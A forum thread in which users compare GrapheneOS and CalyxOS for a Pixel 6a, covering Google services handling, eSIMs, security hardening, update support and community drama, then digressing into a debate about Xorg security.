GrapheneOS vs CalyxOS (In-depth-ish), which should I choose?

Greetings fellow privacy fans! I know that this topic has been discussed to death, but I feel as though this can add to the overall discussion. This also may hopefully end up a being a decent summary of both ROMs.
With the Pixel 6a coming out soon, I am looking to flash either CalyxOS or GrapheneOS. I would like to choose the correct OS for me before I get the phone, as once I flash one or the other, I do not see myself changing it.

My threat model does not require the greatest security of all time, but something that could at least prevent someone from getting into the phone if it sat unattended for short periods of time. I would prefer as much privacy as reasonably possible. (Being anonymous is unimportant for my threat model.)

Recommendations from a few privacy centered people.
Techlore: On the resource page Techlore recommends CalyxOS. (If I remember correctly Techlore used to recommend GrapheneOS first before trying CalyxOS, not sure anymore due to the drama.)
The New Oil: Seems to recommend GrapheneOS (Recommends CalyxOS too, but leans more towards GrapheneOS)
The Hated One: Recommends GrapheneOS (Seems to be for more extreme threat models.)
Mental Outlaw: Recommends CalyxOS (He believes good operation security to be the key to privacy.)
Privacy Guides: Recommends GrapheneOS on Pixel 6 devices. (Only recommends CalyxOS for OnePlus phones and Fairphones. Not sure why they only recommend GrapheneOS otherwise.)
(These sources are certainly not exhaustive, but I believe these are certainly some of the most trusted.)

(Corrections encouraged, its why I posted.)
Privacy.
Both can be completely de-googled, but that is impractical so both ROMs have a solution. CalyxOS’s solution is micro-G. It runs with important permissions (not sure on the official terminology) but sends less data back to google than regular google play services. Graphene’s solution is sand-boxed google play services. This sends less data too and be can be tuned to what permissions it has, and therefore what data it can send (please correct me if I am wrong about sand-boxed google play.) It also runs with less permissions.
If possible I would like to choose which apps get to use or not use micro-G or sand-boxed google play services. I know this can be done with user profiles, but at this time, it disables notifications on the user profile not in use, which is not a feasible option for my use case.
Do work profiles solve this issue? And if so, would this put CalyxOS in a slightly better position as they have built in work profiles and do not rely on a third party app to create a work profile?
A final privacy note is with E-sims. CalyxOS still sends phone information to google with E-sims. (I believe the specific information sent is listed on the Privacy Guides website.) Which I assume to only be an issue with phones that support E-sims. But is this even an issue if someone decides to just not use E-sims? Can this be disabled? Or is this just something CalyxOS needs to improve?
(Final note, on privacy I will not be typing anything about location as I plan to keep anything to do with location off.)

Security.
From my simple understanding, GrapheneOS improves upon the default AOSP security standards and CalyxOS maintains it. I have only partially read the GrapheneOS website on what improvements GrapheneOS makes to security, and while some of the improvements sound like they would be cool to have, I am not sure that I actually need any of them. Anything that is practical let me know.
(Passwords for example, GrapheneOS extends the allowed length past 16 characters. But I cannot use something like KeePassDX to access my phone so I have to physically type the characters, typing 16 for me already takes a long time so is it really worth it to have more? Is there a better way that avoids bio-metrics?)

Performance.
CalyxOS performs the same if not better than default AOSP. GrapheneOS due to hardening is slower than default AOSP. This is my understanding from Techlore’s comparison video (Which seems to have been taken down due to age if I am not mistaken.) My main question being, is this still the case? Or due to the Pixel 6 having physical hardware improvements, do the two ROMs have similar performance speed? Or is performance speed completely different from what I have described here?

The people behind each custom ROM.
GrapheneOS I believe has a small team of at least two members to my knowledge. The leader seems to have intentionally gotten into drama. While this may have in no way affected GrapheneOS as a ROM, it does not inspire confidence. CalyxOS is made by the Calyx Institute which to my knowledge (again), is also a small team. I thought I saw somewhere the Calyx Institute got into some drama? This may just have been from someone who is trying to insight a privacy scare. But I would still like to verify anyway, as it may or may not affect my final decision.

Support
Before I close, I have one final concern, support. If you couldn’t tell, I am waiting for the 6a to save money, as it is basically a cheaper version of the 6. I have heard that CalyxOS supports phones a bit longer than GrapheneOS. I am aware that google themselves have to provide security updates to the pixel, but I would like to not have to buy another phone for as long as possible. And if CalyxOS does support what they can for just a tiny bit longer, it may sway my decision.

Well that was long. Looking forward to replies!

(There is a good summary of questions in the replies.) (Also why did I get a thumbs down? I am confused.)

2 Likes

Hi :slight_smile:

both GrapheneOS and CalyxOS are very good options for Private and Secure Phones :slight_smile:

you already mentioned the biggest differences between the two.

for choosing which to use: that depends on your thread model, your use case and which OS you like better and or feel better with :slight_smile:

The Reason why Graphene has a shorter support time for hardware is: they only Support a Pixel as long as its getting Security patches from Google. Not getting Security Patches for the Hardware from the manufacturer makes a phone increasingly insecure with time as bugs and exploits do not get patched anymore.

As for why Graphene only Supports Pixels: Because they allow flashing of 3rd party Operating Systems with their own keys for Secure Boot so after the installation the Boot loader can be re-locked and the Android Security Model can be preserved and the Pixel Phones have one of most Secure hardware Architecture of modern Phones.

this Thread: How private is using the sandboxed Google Play Services?

and this Thread: GrapheneOS vs CalyxOS

also go into the differences of Graphene and Calyx where you can also find some additional input :slight_smile:

I hope it helps. just know either Operating System will greatly increase the Security and Privacy of your Phone compared to the the Operating System Phones that come preinstalled on Phones.

1 Like

Thank you for your reply!
I have actually read GrapheneOS’s reason for only using pixels and why GrapheneOS only supports as long as google gives security patches and it makes sense. I have also looked into both of those threads. I am mainly looking for the answer of these questions from the main topic. (Hopefully this reply makes this more clear.)

Are any of the sources I mentioned untrustworthy?
Do work profiles solve the issue I mentioned previously?
Is there a way or method solve the E-sim issue with CalyxOS?
Is there something major from GrapheneOS that I am missing security-wise?
Is performance of both ROMs similar to what was shown in one of Techlore’s unlisted videos?
Was there any drama only involving CalyxOS, or have I been lied too?
And finally does CalyxOS give updates longer than google provides firmware updates?

E-Sims: On GrapheneOS you first need to install Google Services to be able to partition new eSIMS. already installed eSims keep working. No google needed. I do not know how it works on Calyx I asume it works with MicroG.
On Graphene you can install Google Services (no need to log into the Google Services) in a separate profil, partition an eSIM and then delete the profile and the other Profiles can keep using the eSIM without the need to install google services on them.

Work profiles: I dont exactly know if they isolate google services on calyx, but on graphene Cross Profile notifications are currently in develpment (it will not helping now, but in the future)

About the Drama: I dont know any details (I avoid Drama online, life is too short and there is too much drama online )
without taking any sides: Strong Opinions by Strong personalities (I hope its the right term, english is my 2nd language so sometimes meanings are lost in translation) as mentioned above, I dont know enough about it to form an informed opinion

The Sources: Honestly I am too new to the Privacy online community to tell you which source is trustworthy or untrustworthy as I am still in the process learning stuff and I only know half of the ones you listed.

Performance: On a Pixel 6 they should perform very similar. About the Video I cant say as I dont know it as its unlisted.

Updates: I do not know.

I hope my limited answers could help you somehow :slight_smile:

Regardless which Operating System you choose, they will greatly increase the Privacy and Security of your Phone compared to stock :slight_smile:

1 Like

When it comes to how to interpret drama in an open source project that’s security related, I don’t have a ton of experience but here are my thoughts. You would need to look into what exactly are the claims being made by people and if they hold up. The privacy-conscious community is small, and the number of people who make software for us is smaller still. It only takes a few people to make a stink.

Now, does that mean that a project is not secure? Not necessarily. Because it’s open source it can all be verified. Both ROMs are still recommended by the broader community. However, if you’re trying to include drama as part of your decision making criteria, look at recent examples of FOSS projects that were intentionally sabotaged by their developers. If you see behavior in a project’s community that is in the threat model you are trying to protect against, like harassment, consider whether you are fine with that community providing a given tool for you.

I could be speaking from inexperience here. I know we can all get passionate sometimes so I think we can be gracious in this area.

1 Like

Yep. Note: Graphene OS is fully de-googled by default and lets you completely remove sandboxed play services if you installed them. On Calyx OS you get to choose on first startup whether you want to install microG or not. If you choose to install microG you can’t fully remove but disable it (similar on how to on stock android).

microG uses signature spoofing so apps think that microG is signed by google and this way is also valid. This requires microG to have some high privileges and being installed as a system app. This means that microG becomes a higher target because it’s less sandboxed than other apps. On GrapheneOS sandboxed play services are on the same level as any other apps. It doesn’t have access to anything on the system level and can only have as many permissions as you grant it as a user. I think both solutions send approximately the same amount of data to google. MicroG sends less while sandboxed play services limits what can be sent.

read this: Usage guide | GrapheneOS
You probably talk about the time apps take to boot.
It’s a security feature and it’s mostly noticeable on older pixel devices but if you would rather have faster app spawning you can disable this in the settings.

Calyx and Graphene can only update as long as Google provides updates for the devices. Calyx goes a bit further and continues support for the open components of a phone. Here is a quote from their website:

[…] are no longer being updated by Google, so the CalyxOS releases for these devices only contain the fixes to the open source components, such as the OS code and the Linux kernel. Proprietary components such as the bootloader, modem firmware, and other firmware no longer get updates.

Personally I think I would go with GrapheneOS since it seems to do most of the stuff Calyx does but better.

1 Like

The guy spreads FUD. Could write an essay debunking this guy.

Both are completely de-Googled. Micro-G in Calyx has elevated privileges and has more attack surface rendering your device insecure. Calyx loves it’s elevated stuff though. It also includes the privileged extension of F-Droid, an insecure app store.

Graphene spawns fresh processes instead of android’s zygote model which does has some minimal performance issues but unnoticeable in any modern Pixel devices.

Micay had some beef with the CEO of CopperHead .Due to their ideological differences Micay exited the company and later while exiting the company Micay deleted the cryptographic keys of copperhead saying he won’t let him harm the users. Copperhead had some losses as they were not able to push software updates or publish apps. The two got into legal battle and people took sides. CalyxOS members and many others were against Micay when clearly he had done nothing wrong. They also started harassing him and attacking him personally to the point he fell suicidal even (from what I heard). It’s only fair for Micay to hold grudge against Calyx.

Note: I have largely oversimplified this whole event. I understand that anyone close to Micay or Micay might feel bad that I left out some details. I apologize in advance.

What should you choose if you had to choose between Graphene and Calyx?

=>GrapheneOS.

There are no such security features in Calyx that’s not in Graphene but there are a lot of security features in Graphene that are not in Calyx.

Should I consider niche custom ROMs like Lineage ?

=>No. Lineage and all it’s derivatives has a lot of security features missing.

1 Like

It has been awhile, so I should update the main post, but in the meantime I would like to clarify things.

I would like to see the essay, I have watched his videos for about a year. Some stuff appears outdated but very rarely do I see him spreading any FUD. Most of what he says lines up with Techlore especially surveillance report, as occasionally they will cover the same stories. Or he does cooking tutorials, (which can hardly be considered FUD.)

(This is edited to remove stuff that could cause drama)
Okay I have notice Mr. Sting Ray that you seem to get into a lot of debates with fellow form users. There is one thing I would like to avoid and that is drama.

An example that concerns me:

Are you really nick-picking based off a single word? I mean you could say that neither are truly de-Googled as they are on a pixel phone which is made by google. I would prefer to stay on friendly terms as the conversation continues, but I am not sure how possible this is.

Also if your curious I went with GrapheneOS in the end without sandboxed play services as I found none of my apps actually need them. (Also why not just use a different app store or RSS feed?)

P.S. Dang, I wish this came off as friendlier, but this seems difficult through text.

  • Comtinues to spread misinformation about how FOSS is more secure than Propietary software.

  • Linux is more secure than Windows and brings the whole Security through Obscurity argument.

  • Promotes niche Foss Browsers that don’t have security in mind. And when not doing that, shills about chromium.

  • Promotes Rooting/Jailbreaking of Android/IOS Phones for security/privacy.

  • Promotes using distros and desktop enviroments using xorg. (Linux Mint, XFCE etc.)

Wow that was a fast reply I am impressed.

First, not an essay. This disappoints me.

Second: FOSS may or may not be more secure, does it matter much?

Third: I am unfamiliar with him ever bringing up obscure browsers. Source?

Fourth: I don’t remember him promoting Jailbreaking, but I believe I recall him mentioning that he would do it.

Fifth: I mean, The New Oil promotes Linux Mint too, so I don’t see the problem. (Also I am not familiar with xorg.)

Kinda does.

On XOrg any application(not privileged) can see other application’s screen, see what you type including but not limited to your root password.Its worse than a keylogger.

I am a fan of his Surveillance Report videos as it covers a lot of reports and stuff.(Yes I know about RSS readers)It’s a shame that he promotes Linux Mint (although I don’t know that I don’t see videos on the New Oil). Any distros using XOrg shouldn’t be used at any threat model even if you are a grandma. Windows Vista is more secure than these Linux distros.

Or if you are a using a Windows/Mac just don’t switch to Linux. It’s possible to improve the privacy on these systems. I don’t know why people don’t understand this but security is directly propotional to privacy.

Interesting, I would like to see more examples of niche browser recommendations. As just one recommendation isn’t too worrying as anyone should be using multiple sources.

Not always, but in many cases. I am sure you know of the example I’d give.

Is xorg online or offline? Does it actively transmit data? I guess I can ask for more sources?

And finally, I want an essay.

Also we should probably start a new thread/dm so it doesn’t clutter this thread.

The fuck? Anyone could build app that can be used for data exfiltration. How is that having privacy? What does it matter if xorg is online or offline? Would you have this poor security on your device?
Privacy does not equal protection from Govt. Spying and Big tech spying.

See joanna rutkowska’s(Founder of QubesOS) blog.
She pointed out the insecurities in 2009. Only 2 DE and 1 window manager supports Wayland in 2022.
The issues were not adressed by XOrg foundation.

Language.
It matters because one it is an active threat that is already an issue as the data has already been sent, the another if xorg is only on device it can most likely be removed and logs cleared with no issue. I mean, there could be many reasons for having it; accidents happen, or it being required for something.

Thread, this might be interesting for others.

The xorg vulnerability is valid, but I also agree with your point that having some privacy depending on who you are trying to be private from is possible even though security is not the highest. You don’t need maximum security first before having privacy. They do work together and increasing security does tend to increase privacy. But just as you can have good security and poor privacy, you can also have good privacy and poor security.

But do try to have more secure options where possible and reasonable (ie Wayland via Fedora)!

Screenshot 2022-09-14 at 11.08.37@2x

and then:

Screenshot 2022-09-14 at 11.08.54@2x